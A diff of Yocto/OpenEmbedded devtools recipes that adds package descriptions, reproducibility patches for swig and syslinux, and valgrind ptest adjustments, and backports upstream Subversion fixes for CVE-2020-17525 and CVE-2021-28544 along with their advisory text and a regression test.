diff --git a/meta/recipes-devtools/strace/strace_5.5.bb b/meta/recipes-devtools/strace/strace_5.5.bb
index ae552da028..4121cfcce7 100644
--- a/meta/recipes-devtools/strace/strace_5.5.bb
+++ b/meta/recipes-devtools/strace/strace_5.5.bb
@@ -1,5 +1,6 @@
SUMMARY = "System call tracing tool"
HOMEPAGE = "http://strace.io"
+DESCRIPTION = "strace is a diagnostic, debugging and instructional userspace utility for Linux. It is used to monitor and tamper with interactions between processes and the Linux kernel, which include system calls, signal deliveries, and changes of process state."
SECTION = "console/utils"
LICENSE = "LGPL-2.1+ & GPL-2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=c756d9d5dabc27663df64f0bf492166c"
diff --git a/meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch b/meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch
new file mode 100644
index 0000000000..5bebde2a86
--- /dev/null
+++ b/meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch
@@ -0,0 +1,117 @@
+Upstream-Status: Backport [ https://subversion.apache.org/security/CVE-2020-17525-advisory.txt ]
+CVE: CVE-2020-17525
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+ Remote unauthenticated denial-of-service in Subversion mod_authz_svn.
+
+Summary:
+========
+
+ Subversion's mod_authz_svn module will crash if the server is using
+ in-repository authz rules with the AuthzSVNReposRelativeAccessFile
+ option and a client sends a request for a non-existing repository URL.
+
+ This can lead to disruption for users of the service.
+
+Known vulnerable:
+=================
+
+ mod_dav_svn+mod_authz_svn servers 1.9.0 through 1.10.6 (inclusive).
+ mod_dav_svn+mod_authz_svn servers 1.11.0 through 1.14.0 (inclusive).
+
+Known fixed:
+============
+
+ mod_dav_svn+mod_authz_svn servers 1.14.1
+ mod_dav_svn+mod_authz_svn servers 1.10.7
+
+Details:
+========
+
+ A null-pointer-dereference has been found in mod_authz_svn that results in
+ a remote unauthenticated Denial-of-Service in some server configurations.
+
+ The vulnerability can be triggered by an unauthenticated user if the
+ Apache HTTPD server is configured to use an in-repository authz file,
+ with configuration directives such as:
+
+ AuthzSVNAccessFile "^/authz"
+ AuthzSVNReposRelativeAccessFile "^/authz"
+
+ The problem originates when sending a GET request to a non-existent
+ repository. The mod_authz_svn module will attempt to find authz rules
+ at a path within the requested SVN repository. Upon constructing this
+ path, the function svn_repos_find_root_path will return a NULL pointer
+ since the requested repository does not exist on-disk.
+ A check for this legitimate NULL pointer condition is missing, which
+ results in a segmentation fault when the NULL pointer is used.
+
+ The in-repository authz feature was first introduced in Subversion 1.8:
+ https://subversion.apache.org/docs/release-notes/1.8.html#in-repo-authz
+
+ The missing NULL check was first introduced during refactoring of the
+ authz code during development work leading up to Subversion 1.9.
+ Subversion 1.8 servers are unaffected.
+
+Severity:
+=========
+
+ CVSSv3 Base Score: 7.5 (High)
+
+ CVSSv3 Base Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+
+ Exploitation results in denial of service by crashing the HTTPD worker
+ handling the request. The impact of this differs depending on how the
+ Apache HTTPD server is configured, including the choice of MPM (Multi-
+ Processing-Module). If the worker shares its memory address space with
+ the main thread, as is the case with e.g. the Event MPM, the entire
+ HTTPD server process will terminate. If the pre-fork MPM is used, the
+ worker will terminate but the HTTPD server will stay up, and service
+ availability will depend on how frequently the attacker is able to
+ send malicious requests which target the vulnerability.
+
+Recommendations:
+================
+
+ We recommend all users to upgrade to a known fixed release of the
+ Subversion mod_dav_svn server.
+
+ Users who are unable to upgrade may apply the included patches.
+
+ As a workaround, the use of in-repository authz rules files with
+ the AuthzSVNReposRelativeAccessFile can be avoided by switching
+ to an alternative configuration which fetches an authz rules file
+ from the server's filesystem, rather than from an SVN repository.
+
+References:
+===========
+
+ CVE-2020-17525 (Subversion)
+
+Reported by:
+============
+
+ Thomas Åkesson, simonsoft.se
+
+Patches:
+========
+
+ Patch for Subversion 1.10, 1.14:
+
+[[[
+Index: subversion/libsvn_repos/config_file.c
+===================================================================
+--- a/subversion/libsvn_repos/config_file.c (revision 1883994)
++++ b/subversion/libsvn_repos/config_file.c (working copy)
+@@ -237,6 +237,10 @@ get_repos_config(svn_stream_t **stream,
+ {
+ /* Search for a repository in the full path. */
+ repos_root_dirent = svn_repos_find_root_path(dirent, scratch_pool);
++ if (repos_root_dirent == NULL)
++ return svn_error_trace(handle_missing_file(stream, checksum, access,
++ url, must_exist,
++ svn_node_none));
+
+ /* Attempt to open a repository at repos_root_dirent. */
+ SVN_ERR(svn_repos_open3(&access->repos, repos_root_dirent, NULL,
+]]]
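
Note on the workaround described in the advisory above: the idea is to keep path-based authorization but have mod_authz_svn read its rules from the server's filesystem instead of from an in-repository "^/" path, which avoids the vulnerable AuthzSVNReposRelativeAccessFile code path. A minimal sketch of such an httpd configuration, written as a shell snippet; the location, parent path and authz file path are illustrative only, not taken from the advisory:

cat > /etc/apache2/conf.d/svn-authz.conf <<'EOF'
<Location /svn>
  DAV svn
  SVNParentPath /srv/svn
  # filesystem path instead of the in-repository "^/authz" form
  AuthzSVNAccessFile /etc/subversion/authz
</Location>
EOF
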
diff --git a/meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch b/meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch
new file mode 100644
index 0000000000..030ead6c66
--- /dev/null
+++ b/meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch
@@ -0,0 +1,146 @@
+From 61382fd8ea66000bd9ee8e203a6eab443220ee40 Mon Sep 17 00:00:00 2001
+From: Nathan Hartman <hartmannathan@apache.org>
+Date: Sun, 27 Mar 2022 05:59:18 +0000
+Subject: [PATCH] On the 1.14.x-r1899227 branch: Merge r1899227 from trunk
+ w/testlist variation
+
+git-svn-id: https://svn.apache.org/repos/asf/subversion/branches/1.14.x-r1899227@1899229 13f79535-47bb-0310-9956-ffa450edef68
+
+CVE: CVE-2021-28544 [https://github.com/apache/subversion/commit/61382fd8ea66000bd9ee8e203a6eab443220ee40]
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ subversion/libsvn_repos/log.c | 26 +++++-------
+ subversion/tests/cmdline/authz_tests.py | 55 +++++++++++++++++++++++++
+ 2 files changed, 65 insertions(+), 16 deletions(-)
+
+diff --git a/subversion/libsvn_repos/log.c b/subversion/libsvn_repos/log.c
+index d9a1fb1085e16..41ca8aed27174 100644
+--- a/subversion/libsvn_repos/log.c
++++ b/subversion/libsvn_repos/log.c
+@@ -337,42 +337,36 @@ detect_changed(svn_repos_revision_access_level_t *access_level,
+ if ( (change->change_kind == svn_fs_path_change_add)
+ || (change->change_kind == svn_fs_path_change_replace))
+ {
+- const char *copyfrom_path = change->copyfrom_path;
+- svn_revnum_t copyfrom_rev = change->copyfrom_rev;
+-
+ /* the following is a potentially expensive operation since on FSFS
+ we will follow the DAG from ROOT to PATH and that requires
+ actually reading the directories along the way. */
+ if (!change->copyfrom_known)
+ {
+- SVN_ERR(svn_fs_copied_from(&copyfrom_rev, &copyfrom_path,
++ SVN_ERR(svn_fs_copied_from(&change->copyfrom_rev, &change->copyfrom_path,
+ root, path, iterpool));
+ change->copyfrom_known = TRUE;
+ }
+
+- if (copyfrom_path && SVN_IS_VALID_REVNUM(copyfrom_rev))
++ if (change->copyfrom_path && SVN_IS_VALID_REVNUM(change->copyfrom_rev))
+ {
+- svn_boolean_t readable = TRUE;
+-
+ if (callbacks->authz_read_func)
+ {
+ svn_fs_root_t *copyfrom_root;
++ svn_boolean_t readable;
+
+ SVN_ERR(svn_fs_revision_root(&copyfrom_root, fs,
+- copyfrom_rev, iterpool));
++ change->copyfrom_rev, iterpool));
+ SVN_ERR(callbacks->authz_read_func(&readable,
+ copyfrom_root,
+- copyfrom_path,
++ change->copyfrom_path,
+ callbacks->authz_read_baton,
+ iterpool));
+ if (! readable)
+- found_unreadable = TRUE;
+- }
+-
+- if (readable)
+- {
+- change->copyfrom_path = copyfrom_path;
+- change->copyfrom_rev = copyfrom_rev;
++ {
++ found_unreadable = TRUE;
++ change->copyfrom_path = NULL;
++ change->copyfrom_rev = SVN_INVALID_REVNUM;
++ }
+ }
+ }
+ }
+diff --git a/subversion/tests/cmdline/authz_tests.py b/subversion/tests/cmdline/authz_tests.py
+index 760cb3663d02f..92e8a5e1935c9 100755
+--- a/subversion/tests/cmdline/authz_tests.py
++++ b/subversion/tests/cmdline/authz_tests.py
+@@ -1731,6 +1731,60 @@ def empty_group(sbox):
+ '--username', svntest.main.wc_author,
+ sbox.repo_url)
+
++@Skip(svntest.main.is_ra_type_file)
++def log_inaccessible_copyfrom(sbox):
++ "log doesn't leak inaccessible copyfrom paths"
++
++ sbox.build(empty=True)
++ sbox.simple_add_text('secret', 'private')
++ sbox.simple_commit(message='log message for r1')
++ sbox.simple_copy('private', 'public')
++ sbox.simple_commit(message='log message for r2')
++
++ svntest.actions.enable_revprop_changes(sbox.repo_dir)
++ # Remove svn:date and svn:author for predictable output.
++ svntest.actions.run_and_verify_svn(None, [], 'propdel', '--revprop',
++ '-r2', 'svn:date', sbox.repo_url)
++ svntest.actions.run_and_verify_svn(None, [], 'propdel', '--revprop',
++ '-r2', 'svn:author', sbox.repo_url)
++
++ write_restrictive_svnserve_conf(sbox.repo_dir)
++
++ # First test with blanket access.
++ write_authz_file(sbox,
++ {"/" : "* = rw"})
++ expected_output = svntest.verify.ExpectedOutput([
++ "------------------------------------------------------------------------\n",
++ "r2 | (no author) | (no date) | 1 line\n",
++ "Changed paths:\n",
++ " A /public (from /private:1)\n",
++ "\n",
++ "log message for r2\n",
++ "------------------------------------------------------------------------\n",
++ ])
++ svntest.actions.run_and_verify_svn(expected_output, [],
++ 'log', '-r2', '-v',
++ sbox.repo_url)
++
++ # Now test with an inaccessible copy source (/private).
++ write_authz_file(sbox,
++ {"/" : "* = rw"},
++ {"/private" : "* ="})
++ expected_output = svntest.verify.ExpectedOutput([
++ "------------------------------------------------------------------------\n",
++ "r2 | (no author) | (no date) | 1 line\n",
++ "Changed paths:\n",
++ # The copy is shown as a plain add with no copyfrom info.
++ " A /public\n",
++ "\n",
++ # No log message, as the revision is only partially visible.
++ "\n",
++ "------------------------------------------------------------------------\n",
++ ])
++ svntest.actions.run_and_verify_svn(expected_output, [],
++ 'log', '-r2', '-v',
++ sbox.repo_url)
++
+
+ ########################################################################
+ # Run the tests
+@@ -1771,6 +1825,7 @@ def empty_group(sbox):
+ inverted_group_membership,
+ group_member_empty_string,
+ empty_group,
++ log_inaccessible_copyfrom,
+ ]
+ serial_only = True
+
diff --git a/meta/recipes-devtools/subversion/subversion_1.13.0.bb b/meta/recipes-devtools/subversion/subversion_1.13.0.bb
index b3c44ca9b9..5643191569 100644
--- a/meta/recipes-devtools/subversion/subversion_1.13.0.bb
+++ b/meta/recipes-devtools/subversion/subversion_1.13.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "Subversion (svn) version control system client"
HOMEPAGE = "http://subversion.apache.org"
+DESCRIPTION = "Subversion is an open source version control system."
SECTION = "console/network"
LICENSE = "Apache-2 & MIT"
LIC_FILES_CHKSUM = "file://LICENSE;md5=6487ae7094d359fa90fb9c4096e52e2b"
@@ -11,6 +12,8 @@ SRC_URI = "${APACHE_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
file://disable_macos.patch \
file://0001-Fix-libtool-name-in-configure.ac.patch \
file://serfmacro.patch \
+ file://CVE-2020-17525.patch \
+ file://CVE-2021-28544.patch \
"
SRC_URI[md5sum] = "3004b4dae18bf45a0b6ea4ef8820064d"
diff --git a/meta/recipes-devtools/swig/swig/determinism.patch b/meta/recipes-devtools/swig/swig/determinism.patch
new file mode 100644
index 0000000000..8ffb4bce8e
--- /dev/null
+++ b/meta/recipes-devtools/swig/swig/determinism.patch
@@ -0,0 +1,19 @@
+Remove the compiler commandline/platform from the compiled binary as this
+breaks reproducibility.
+
+Upstream-Status: Inappropriate [OE reproducibility fix upstream unlikely to take]
+RP 2021/3/1
+
+
+Index: swig-3.0.12/Source/Modules/main.cxx
+===================================================================
+--- swig-3.0.12.orig/Source/Modules/main.cxx
++++ swig-3.0.12/Source/Modules/main.cxx
+@@ -636,7 +636,6 @@ void SWIG_getoptions(int argc, char *arg
+ }
+ } else if (strcmp(argv[i], "-version") == 0) {
+ fprintf(stdout, "\nSWIG Version %s\n", Swig_package_version());
+- fprintf(stdout, "\nCompiled with %s [%s]\n", SWIG_CXX, SWIG_PLATFORM);
+ fprintf(stdout, "\nConfigured options: %cpcre\n",
+ #ifdef HAVE_PCRE
+ '+'
diff --git a/meta/recipes-devtools/swig/swig_3.0.12.bb b/meta/recipes-devtools/swig/swig_3.0.12.bb
index 45026c9700..090aaa8112 100644
--- a/meta/recipes-devtools/swig/swig_3.0.12.bb
+++ b/meta/recipes-devtools/swig/swig_3.0.12.bb
@@ -6,6 +6,7 @@ SRC_URI += "file://0001-Use-proc-self-exe-for-swig-swiglib-on-non-Win32-plat.pat
file://swig-3.0.12-Coverity-fix-issue-reported-for-SWIG_Python_FixMetho.patch \
file://Python-Fix-new-GCC8-warnings-in-generated-code.patch \
file://0001-Fix-generated-code-for-constant-expressions-containi.patch \
+ file://determinism.patch \
"
SRC_URI[md5sum] = "82133dfa7bba75ff9ad98a7046be687c"
SRC_URI[sha256sum] = "7cf9f447ae7ed1c51722efc45e7f14418d15d7a1e143ac9f09a668999f4fc94d"
diff --git a/meta/recipes-devtools/syslinux/syslinux/determinism.patch b/meta/recipes-devtools/syslinux/syslinux/determinism.patch
new file mode 100644
index 0000000000..2fb8c64df3
--- /dev/null
+++ b/meta/recipes-devtools/syslinux/syslinux/determinism.patch
@@ -0,0 +1,22 @@
+In order to build deterministic binaries, we need to sort the wildcard expansion
+so the libraries are linked in the same order each time. This fixes reproducibility
+issues within syslinux builds.
+
+Upstream-Status: Pending
+RP 2021/3/1
+
+Index: syslinux-6.04-pre2/mk/lib.mk
+===================================================================
+--- syslinux-6.04-pre2.orig/mk/lib.mk
++++ syslinux-6.04-pre2/mk/lib.mk
+@@ -130,8 +130,8 @@ LIBENTRY_OBJS = \
+ exit.o
+
+ LIBGCC_OBJS = \
+- $(patsubst $(com32)/lib/%.c,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.c)) \
+- $(patsubst $(com32)/lib/%.S,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.S))
++ $(sort $(patsubst $(com32)/lib/%.c,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.c))) \
++ $(sort $(patsubst $(com32)/lib/%.S,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.S)))
+
+ LIBCONSOLE_OBJS = \
+ \
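
The sort is needed because GNU make's $(wildcard) is not guaranteed to return names in a stable order across hosts and filesystems, so the object list and hence the link order can vary between builds; wrapping it in $(sort) pins one reproducible order. A small standalone illustration (the demo paths are made up):

mkdir -p /tmp/wcdemo && touch /tmp/wcdemo/b.c /tmp/wcdemo/a.c /tmp/wcdemo/c.c
printf 'all:\n\t@echo "raw:    $(wildcard /tmp/wcdemo/*.c)"\n\t@echo "sorted: $(sort $(wildcard /tmp/wcdemo/*.c))"\n' > /tmp/wcdemo.mk
make -f /tmp/wcdemo.mk   # the sorted line is stable; the raw line need not be
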
diff --git a/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb b/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb
index 3e7eef3a75..a5618327bf 100644
--- a/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb
+++ b/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb
@@ -1,5 +1,6 @@
SUMMARY = "Multi-purpose linux bootloader"
HOMEPAGE = "http://www.syslinux.org/"
+DESCRIPTION = "The Syslinux Project covers lightweight bootloaders for MS-DOS FAT filesystems (SYSLINUX), network booting (PXELINUX), bootable "El Torito" CD-ROMs (ISOLINUX), and Linux ext2/ext3/ext4 or btrfs filesystems (EXTLINUX). The project also includes MEMDISK, a tool to boot legacy operating systems (such as DOS) from nontraditional media; it is usually used in conjunction with PXELINUX and ISOLINUX."
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
file://README;beginline=35;endline=41;md5=558f2c71cb1fb9ba511ccd4858e48e8a"
@@ -22,11 +23,16 @@ SRC_URI = "https://www.zytor.com/pub/syslinux/Testing/6.04/syslinux-${PV}.tar.xz
file://0009-linux-syslinux-implement-install_bootblock.patch \
file://0010-Workaround-multiple-definition-of-symbol-errors.patch \
file://0001-install-don-t-install-obsolete-file-com32.ld.patch \
+ file://determinism.patch \
"
SRC_URI[md5sum] = "2b31c78f087f99179feb357da312d7ec"
SRC_URI[sha256sum] = "4441a5d593f85bb6e8d578cf6653fb4ec30f9e8f4a2315a3d8f2d0a8b3fadf94"
+# remove at next version upgrade or when output changes
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
+
UPSTREAM_CHECK_URI = "https://www.zytor.com/pub/syslinux/"
UPSTREAM_CHECK_REGEX = "syslinux-(?P<pver>.+)\.tar"
UPSTREAM_VERSION_UNKNOWN = "1"
diff --git a/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb b/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb
index a7a1f0ff1a..e1233ffde0 100644
--- a/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb
+++ b/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb
@@ -1,8 +1,14 @@
+SUMMARY = "Boot performance graphing tool"
+DESCRIPTION = "For systemd-bootchart, several proc debug interfaces are required in the kernel config: \
+ CONFIG_SCHEDSTATS \
+below is optional, for additional info: \
+ CONFIG_SCHED_DEBUG"
+HOMEPAGE = "https://github.com/systemd/systemd-bootchart"
LICENSE = "LGPLv2.1 & GPLv2"
LIC_FILES_CHKSUM = "file://LICENSE.LGPL2.1;md5=4fbd65380cdd255951079008b364516c \
file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe"
-SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https \
+SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https;branch=master \
file://0001-architecture-Recognise-RISCV-32-RISCV-64.patch \
file://mips64.patch \
"
diff --git a/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb b/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
index ed14fe66b1..b671956cc8 100644
--- a/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
+++ b/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
@@ -1,5 +1,6 @@
SUMMARY = "Target Communication Framework for the Eclipse IDE"
HOMEPAGE = "http://wiki.eclipse.org/TCF"
+DESCRIPTION = "TCF is a vendor-neutral, lightweight, extensible network protocol mainly for communicating with embedded systems (targets)."
BUGTRACKER = "https://bugs.eclipse.org/bugs/"
LICENSE = "EPL-1.0 | EDL-1.0"
@@ -9,7 +10,7 @@ SRCREV = "a022ef2f1acfd9209a1bf792dda14ae4b0d1b60f"
PV = "1.7.0+git${SRCPV}"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
-SRC_URI = "git://git.eclipse.org/gitroot/tcf/org.eclipse.tcf.agent \
+SRC_URI = "git://git.eclipse.org/r/tcf/org.eclipse.tcf.agent.git;protocol=https;branch=master \
file://fix_ranlib.patch \
file://ldflags.patch \
file://tcf-agent.init \
diff --git a/meta/recipes-devtools/tcltk/tcl_8.6.10.bb b/meta/recipes-devtools/tcltk/tcl_8.6.10.bb
index aedd96b021..35a91b4f09 100644
--- a/meta/recipes-devtools/tcltk/tcl_8.6.10.bb
+++ b/meta/recipes-devtools/tcltk/tcl_8.6.10.bb
@@ -1,5 +1,6 @@
SUMMARY = "Tool Command Language"
HOMEPAGE = "http://tcl.sourceforge.net"
+DESCRIPTION = "Tool Command Language, is an open-source multi-purpose C library which includes a powerful dynamic scripting language. Together they provide ideal cross-platform development environment for any programming project."
SECTION = "devel/tcltk"
# http://www.tcl.tk/software/tcltk/license.html
@@ -32,6 +33,7 @@ SRC_URI_class-native = "${BASE_SRC_URI}"
S = "${WORKDIR}/${BPN}${PV}/unix"
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/${BPN}${PV}"
VER = "${PV}"
inherit autotools ptest binconfig update-alternatives
diff --git a/meta/recipes-devtools/unfs3/unfs3_git.bb b/meta/recipes-devtools/unfs3/unfs3_git.bb
index d60cee87c9..d1b3fb8f57 100644
--- a/meta/recipes-devtools/unfs3/unfs3_git.bb
+++ b/meta/recipes-devtools/unfs3/unfs3_git.bb
@@ -2,6 +2,7 @@ SUMMARY = "Userspace NFS server v3 protocol"
DESCRIPTION = "UNFS3 is a user-space implementation of the NFSv3 server \
specification. It provides a daemon for the MOUNT and NFS protocols, which \
are used by NFS clients for accessing files on the server."
+HOMEPAGE = "https://github.com/unfs3/unfs3"
SECTION = "console/network"
LICENSE = "unfs3"
LIC_FILES_CHKSUM = "file://LICENSE;md5=9475885294e17c0cc0067820d042792e"
@@ -13,7 +14,7 @@ DEPENDS_append_class-nativesdk = " flex-nativesdk"
ASNEEDED = ""
S = "${WORKDIR}/git"
-SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https \
+SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https;branch=master \
file://unfs3_parallel_build.patch \
file://alternate_rpc_ports.patch \
file://fix_pid_race_parent_writes_child_pid.patch \
@@ -35,7 +36,7 @@ BBCLASSEXTEND = "native nativesdk"
inherit autotools
EXTRA_OECONF_append_class-native = " --sbindir=${bindir}"
CFLAGS_append = " -I${STAGING_INCDIR}/tirpc"
-LDFLAGS_append = " -ltirpc"
+EXTRA_OECONF_append = " LIBS=-ltirpc"
# Turn off these header detects else the inode search
# will walk entire file systems and this is a real problem
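
One practical difference behind the LDFLAGS -> LIBS move above: with autoconf, values passed in LIBS are used by configure's own link tests and are placed after the object files on every link line, whereas a library appended through LDFLAGS can land before the objects that need it. Outside of BitBake the equivalent invocation would look roughly like this (the host triplet is illustrative):

./configure --host=aarch64-poky-linux LIBS="-ltirpc"
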
diff --git a/meta/recipes-devtools/unifdef/unifdef_2.12.bb b/meta/recipes-devtools/unifdef/unifdef_2.12.bb
index 22b10ba234..b42051b8b6 100644
--- a/meta/recipes-devtools/unifdef/unifdef_2.12.bb
+++ b/meta/recipes-devtools/unifdef/unifdef_2.12.bb
@@ -2,6 +2,7 @@ SUMMARY = "Selectively remove #ifdef statements from sources"
SECTION = "devel"
LICENSE = "BSD-2-Clause"
HOMEPAGE = "http://dotat.at/prog/unifdef/"
+DESCRIPTION = "The unifdef utility selectively processes conditional C preprocessor #if and #ifdef directives. It removes from a file both the directives and the additional text that they delimit, while otherwise leaving the file alone."
LIC_FILES_CHKSUM = "file://COPYING;md5=3498caf346f6b77934882101749ada23 \
file://unifdef.c;endline=32;md5=6f4ee8085d6e6ab0f7cb4390e1a9c497 \
diff --git a/meta/recipes-devtools/vala/vala.inc b/meta/recipes-devtools/vala/vala.inc
index 703ed1aa8d..71da2ef07c 100644
--- a/meta/recipes-devtools/vala/vala.inc
+++ b/meta/recipes-devtools/vala/vala.inc
@@ -1,4 +1,5 @@
SUMMARY = "C#-like programming language for easing GObject programming"
+HOMEPAGE = "http://vala-project.org"
DESCRIPTION = "Vala is a C#-like language dedicated to ease GObject programming. \
Vala compiles to plain C and has no runtime environment nor penalities whatsoever."
SECTION = "devel"
@@ -12,7 +13,6 @@ DEPENDS_append_class-target = " ${@bb.utils.contains('DISTRO_FEATURES', 'api-doc
# vala-native contains a native version of vapigen, which we use instead of the target one
DEPENDS_append_class-target = " vala-native"
BBCLASSEXTEND = "native"
-HOMEPAGE = "http://vala-project.org"
LICENSE = "LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=fbc093901857fcd118f065f900982c24"
diff --git a/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch b/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch
index 7985308e41..0c399ef52c 100644
--- a/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch
+++ b/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch
@@ -19,6 +19,11 @@ Upstream-Status: Pending
Signed-off-by: Dave Lerner <dave.lerner@windriver.com>
Signed-off-by: Tudor Florea <tudor.florea@enea.com>
Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+
+Increase time limit to 90 s.
+(double the expected time of drd/tests/std_list on qemuarm64)
+
+Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com>
---
tests/vg_regtest.in | 75 +++++++++++++++++++++++++++++++++++++++--------------
1 file changed, 55 insertions(+), 20 deletions(-)
@@ -66,7 +71,7 @@ index a441f42..cb05b52 100755
# Since most of the program time is spent in system() calls, need this to
# propagate a Ctrl-C enabling us to quit.
-sub mysystem($)
-+# Enforce 30 seconds limit for the test.
++# Enforce 90 seconds limit for the test.
+# This resume execution of the remaining tests if valgrind hangs.
+sub mysystem($)
{
@@ -76,7 +81,7 @@ index a441f42..cb05b52 100755
+ my $exit_code=0;
+ eval {
+ local $SIG{'ALRM'} = sub { die "timed out\n" };
-+ alarm(30);
++ alarm(90);
+ $exit_code = system($_[0]);
+ alarm (0);
+ ($exit_code == 2) and die "SIGINT\n"; # 2 is SIGINT
diff --git a/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64 b/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64
index a3a0c6e50f..afa6a94825 100644
--- a/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64
+++ b/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64
@@ -31,8 +31,6 @@ drd/tests/annotate_static
drd/tests/annotate_trace_memory
drd/tests/annotate_trace_memory_xml
drd/tests/atomic_var
-drd/tests/bar_bad
-drd/tests/bar_bad_xml
drd/tests/bar_trivial
drd/tests/bug-235681
drd/tests/bug322621
@@ -122,6 +120,7 @@ drd/tests/tc19_shadowmem
drd/tests/tc21_pthonce
drd/tests/tc22_exit_w_lock
drd/tests/tc23_bogus_condwait
+gdbserver_tests/hginfo
helgrind/tests/annotate_rwlock
helgrind/tests/annotate_smart_pointer
helgrind/tests/bar_bad
diff --git a/meta/recipes-devtools/valgrind/valgrind/remove-for-all b/meta/recipes-devtools/valgrind/valgrind/remove-for-all
new file mode 100644
index 0000000000..88a11ca332
--- /dev/null
+++ b/meta/recipes-devtools/valgrind/valgrind/remove-for-all
@@ -0,0 +1,4 @@
+drd/tests/bar_bad
+drd/tests/bar_bad_xml
+gdbserver_tests/hginfo
+memcheck/tests/linux/timerfd-syscall
diff --git a/meta/recipes-devtools/valgrind/valgrind/run-ptest b/meta/recipes-devtools/valgrind/valgrind/run-ptest
index 97b0a85dbf..7217dfca5d 100755
--- a/meta/recipes-devtools/valgrind/valgrind/run-ptest
+++ b/meta/recipes-devtools/valgrind/valgrind/run-ptest
@@ -17,6 +17,12 @@ EXP_TOOLS="exp-bbv exp-dhat exp-sgcheck"
GDB_BIN=@bindir@/gdb
cd ${VALGRIND_LIB}/ptest && ./gdbserver_tests/make_local_links ${GDB_BIN}
+echo "Hide valgrind tests that are non-deterministic"
+echo "Reported at https://bugs.kde.org/show_bug.cgi?id=430321"
+for i in `cat remove-for-all`; do
+ mv $i.vgtest $i.IGNORE;
+done
+
arch=`arch`
if [ "$arch" = "aarch64" ]; then
echo "Aarch64: Hide valgrind tests that result in defunct process and then out of memory"
@@ -44,6 +50,10 @@ if [ "$arch" = "aarch64" ]; then
done
fi
+echo "Restore valgrind tests that are non-deterministc"
+for i in `cat remove-for-all`; do
+ mv $i.IGNORE $i.vgtest;
+done
passed=`grep PASS: ${LOG}|wc -l`
failed=`grep FAIL: ${LOG}|wc -l`
diff --git a/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb b/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb
index a764d18177..67999e579a 100644
--- a/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb
+++ b/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "Valgrind memory debugger and instrumentation framework"
HOMEPAGE = "http://valgrind.org/"
+DESCRIPTION = "Valgrind is an instrumentation framework for building dynamic analysis tools. There are Valgrind tools that can automatically detect many memory management and threading bugs, and profile your programs in detail."
BUGTRACKER = "http://valgrind.org/support/bug_reports.html"
LICENSE = "GPLv2 & GPLv2+ & BSD"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
@@ -16,6 +17,7 @@ SRC_URI = "https://sourceware.org/pub/valgrind/valgrind-${PV}.tar.bz2 \
file://Added-support-for-PPC-instructions-mfatbu-mfatbl.patch \
file://run-ptest \
file://remove-for-aarch64 \
+ file://remove-for-all \
file://0004-Fix-out-of-tree-builds.patch \
file://0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch \
file://0001-Remove-tests-that-fail-to-build-on-some-PPC32-config.patch \
@@ -105,7 +107,7 @@ VALGRINDARCH_mipsel = "mips32"
VALGRINDARCH_mips64el = "mips64"
VALGRINDARCH_powerpc = "ppc"
VALGRINDARCH_powerpc64 = "ppc64"
-VALGRINDARCH_powerpc64el = "ppc64le"
+VALGRINDARCH_powerpc64le = "ppc64le"
INHIBIT_PACKAGE_STRIP_FILES = "${PKGD}${libdir}/valgrind/vgpreload_memcheck-${VALGRINDARCH}-linux.so"
@@ -171,6 +173,7 @@ do_install_ptest() {
